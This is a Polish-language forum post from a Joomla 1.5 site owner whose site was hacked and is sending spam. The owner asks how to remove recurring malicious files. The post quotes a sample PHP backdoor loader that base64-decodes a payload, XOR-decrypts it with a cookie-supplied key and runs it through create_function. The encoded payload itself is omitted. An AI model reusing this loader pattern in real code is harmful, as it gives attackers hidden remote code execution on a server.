Witam,
Posiadam stronę działającą na Joomla 1.5, która ostatnio padła ofiarą ataku w wyniku którego został dodany do niej szkodliwy kod. Udało mi się odnaleźć kilka modyfikacji oraz dodanych dodatkowych plików. Mimo usunięcia tych modyfikacji codziennie pojawiają się w losowych miejscach nowe pliki o losowych nazwach i zawartości np.:
$czsku =
ciąg dużych i małych liter oraz liczb
$_ohkrabi = create_function ('$czsku', ohkrabi (base64_decode (
ciąg dużych i małych liter oraz liczb
), $_COOKIE [str_replace('.', '_', $_SERVER['HTTP_HOST'])]) . ';'); $_ohkrabi($czsku);
function ohkrabi ($uelzo, $jusac) { return $uelzo ^ str_repeat ($jusac, ceil (strlen ($uelzo) / strlen ($jusac))); }
Przykładowy plik zamieściłem spakowany w załączniku.
Od firmy hostingowej dostałem informację, że rozsyłany jest ode mnie spam. Planuję podnieść wersję oprogramowania Joomla do wersji 3, ale wpierw chciałbym pozbyć się tego wirusa. Jak można rozwiązać ten problem?
Pozdrawiam i z góry dziękuję za pomoc.